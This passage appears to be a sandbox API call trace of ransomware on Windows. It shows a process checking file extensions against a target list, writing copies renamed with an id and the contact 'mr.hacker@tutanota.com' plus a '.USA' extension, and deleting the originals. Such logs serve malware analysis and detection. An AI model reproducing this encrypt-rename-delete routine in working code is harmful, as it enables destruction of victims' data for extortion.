Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0048.491] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0048.491] lstrlenW (lpString=".doc") returned 4 [0048.491] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.491] lstrlenW (lpString=".docx") returned 5 [0048.491] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.491] lstrlenW (lpString=".pdf") returned 4 [0048.491] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.491] lstrlenW (lpString=".xls") returned 4 [0048.491] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.491] lstrlenW (lpString=".xlsx") returned 5 [0048.491] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.491] lstrlenW (lpString=".ppt") returned 4 [0048.491] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.491] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0048.491] lstrlenW (lpString=".zip") returned 4 [0048.491] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.491] lstrlenW (lpString=".rar") returned 4 [0048.491] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.491] lstrlenW (lpString=".bz2") returned 4 [0048.491] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.491] lstrlenW (lpString=".7z") returned 3 [0048.491] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.491] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0048.491] lstrlenW (lpString=".dbf") returned 4 [0048.491] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.492] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0048.492] lstrlenW (lpString=".1cd") returned 4 [0048.492] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.492] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0048.492] lstrlenW (lpString=".jpg") returned 4 [0048.492] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.492] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0048.492] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0048.492] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0048.492] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=3611) returned 1 [0048.492] CloseHandle (hObject=0x1b4) returned 1 [0048.492] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\preview.gif")) returned 0x20 [0048.492] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0048.492] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0048.492] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0048.493] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0048.493] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0048.863] GetLastError () returned 0x0 [0048.863] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0xe1b, lpOverlapped=0x0) returned 1 [0048.865] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe20, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xe20, lpOverlapped=0x0) returned 1 [0048.865] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0048.866] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xea, lpOverlapped=0x0) returned 1 [0048.866] SetEndOfFile (hFile=0x160) returned 1 [0048.866] CloseHandle (hObject=0x160) returned 1 [0048.866] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0048.866] SetEndOfFile (hFile=0x1b4) returned 1 [0048.867] CloseHandle (hObject=0x1b4) returned 1 [0048.867] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0048.867] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\preview.gif")) returned 1 [0048.867] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0048.867] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0048.867] lstrlenW (lpString=".doc") returned 4 [0048.867] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.867] lstrlenW (lpString=".docx") returned 5 [0048.867] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.867] lstrlenW (lpString=".pdf") returned 4 [0048.867] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.867] lstrlenW (lpString=".xls") returned 4 [0048.867] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.867] lstrlenW (lpString=".xlsx") returned 5 [0048.867] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.867] lstrlenW (lpString=".ppt") returned 4 [0048.867] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.867] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0048.868] lstrlenW (lpString=".zip") returned 4 [0048.868] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.868] lstrlenW (lpString=".rar") returned 4 [0048.868] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.868] lstrlenW (lpString=".bz2") returned 4 [0048.868] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.868] lstrlenW (lpString=".7z") returned 3 [0048.868] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.868] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0048.868] lstrlenW (lpString=".dbf") returned 4 [0048.868] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.868] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0048.868] lstrlenW (lpString=".1cd") returned 4 [0048.868] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.868] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0048.868] lstrlenW (lpString=".jpg") returned 4 [0048.868] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.868] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0048.868] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0048.868] lstrlenW (lpString=".doc") returned 4 [0048.868] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.868] lstrlenW (lpString=".docx") returned 5 [0048.868] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.868] lstrlenW (lpString=".pdf") returned 4 [0048.868] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.868] lstrlenW (lpString=".xls") returned 4 [0048.868] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.868] lstrlenW (lpString=".xlsx") returned 5 [0048.868] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.868] lstrlenW (lpString=".ppt") returned 4 [0048.868] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.868] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0048.868] lstrlenW (lpString=".zip") returned 4 [0048.868] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.868] lstrlenW (lpString=".rar") returned 4 [0048.869] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.869] lstrlenW (lpString=".bz2") returned 4 [0048.869] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.869] lstrlenW (lpString=".7z") returned 3 [0048.869] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.869] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0048.869] lstrlenW (lpString=".dbf") returned 4 [0048.869] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.869] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0048.869] lstrlenW (lpString=".1cd") returned 4 [0048.869] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.869] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0048.869] lstrlenW (lpString=".jpg") returned 4 [0048.869] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.869] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0048.869] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0048.869] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0048.869] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=1737) returned 1 [0048.869] CloseHandle (hObject=0x1b4) returned 1 [0048.870] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif")) returned 0x20 [0048.870] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0048.870] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0048.870] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0048.870] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0048.870] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0048.872] GetLastError () returned 0x0 [0048.872] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x6c9, lpOverlapped=0x0) returned 1 [0048.874] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x6d0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x6d0, lpOverlapped=0x0) returned 1 [0048.874] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0048.875] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xea, lpOverlapped=0x0) returned 1 [0048.875] SetEndOfFile (hFile=0x160) returned 1 [0048.875] CloseHandle (hObject=0x160) returned 1 [0048.875] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0048.875] SetEndOfFile (hFile=0x1b4) returned 1 [0048.876] CloseHandle (hObject=0x1b4) returned 1 [0048.876] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0048.876] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif")) returned 1 [0048.876] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0048.876] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0048.876] lstrlenW (lpString=".doc") returned 4 [0048.876] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.876] lstrlenW (lpString=".docx") returned 5 [0048.876] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.876] lstrlenW (lpString=".pdf") returned 4 [0048.876] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.876] lstrlenW (lpString=".xls") returned 4 [0048.876] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.876] lstrlenW (lpString=".xlsx") returned 5 [0048.876] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.876] lstrlenW (lpString=".ppt") returned 4 [0048.876] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.876] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0048.876] lstrlenW (lpString=".zip") returned 4 [0048.876] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.876] lstrlenW (lpString=".rar") returned 4 [0048.876] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.877] lstrlenW (lpString=".bz2") returned 4 [0048.877] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.877] lstrlenW (lpString=".7z") returned 3 [0048.877] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.877] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0048.877] lstrlenW (lpString=".dbf") returned 4 [0048.877] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.877] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0048.877] lstrlenW (lpString=".1cd") returned 4 [0048.877] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.877] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0048.877] lstrlenW (lpString=".jpg") returned 4 [0048.877] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.877] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0048.877] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0048.877] lstrlenW (lpString=".doc") returned 4 [0048.877] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.877] lstrlenW (lpString=".docx") returned 5 [0048.877] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.877] lstrlenW (lpString=".pdf") returned 4 [0048.877] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.877] lstrlenW (lpString=".xls") returned 4 [0048.877] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.877] lstrlenW (lpString=".xlsx") returned 5 [0048.877] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.877] lstrlenW (lpString=".ppt") returned 4 [0048.877] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.877] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0048.877] lstrlenW (lpString=".zip") returned 4 [0048.877] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.877] lstrlenW (lpString=".rar") returned 4 [0048.877] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.877] lstrlenW (lpString=".bz2") returned 4 [0048.877] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.878] lstrlenW (lpString=".7z") returned 3 [0048.878] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.878] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0048.878] lstrlenW (lpString=".dbf") returned 4 [0048.878] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.878] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0048.878] lstrlenW (lpString=".1cd") returned 4 [0048.878] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.878] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0048.878] lstrlenW (lpString=".jpg") returned 4 [0048.878] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.878] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0048.878] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0048.878] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0048.878] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=33479) returned 1 [0048.878] CloseHandle (hObject=0x1b4) returned 1 [0048.878] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png")) returned 0x20 [0048.879] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0048.879] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0048.879] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0048.879] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0048.879] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0048.879] GetLastError () returned 0x0 [0048.879] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x82c7, lpOverlapped=0x0) returned 1 [0049.067] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x82d0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x82d0, lpOverlapped=0x0) returned 1 [0049.068] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0049.068] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0049.068] SetEndOfFile (hFile=0x160) returned 1 [0049.074] CloseHandle (hObject=0x160) returned 1 [0049.074] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0049.074] SetEndOfFile (hFile=0x1b4) returned 1 [0049.075] CloseHandle (hObject=0x1b4) returned 1 [0049.075] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0049.076] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png")) returned 1 [0049.076] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0049.076] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0049.076] lstrlenW (lpString=".doc") returned 4 [0049.076] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0049.076] lstrlenW (lpString=".docx") returned 5 [0049.076] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0049.076] lstrlenW (lpString=".pdf") returned 4 [0049.076] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0049.076] lstrlenW (lpString=".xls") returned 4 [0049.076] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0049.076] lstrlenW (lpString=".xlsx") returned 5 [0049.076] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0049.076] lstrlenW (lpString=".ppt") returned 4 [0049.076] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0049.076] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0049.076] lstrlenW (lpString=".zip") returned 4 [0049.076] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0049.076] lstrlenW (lpString=".rar") returned 4 [0049.076] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0049.076] lstrlenW (lpString=".bz2") returned 4 [0049.076] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0049.076] lstrlenW (lpString=".7z") returned 3 [0049.076] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0049.076] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0049.076] lstrlenW (lpString=".dbf") returned 4 [0049.076] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0049.076] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0049.076] lstrlenW (lpString=".1cd") returned 4 [0049.077] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0049.077] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0049.077] lstrlenW (lpString=".jpg") 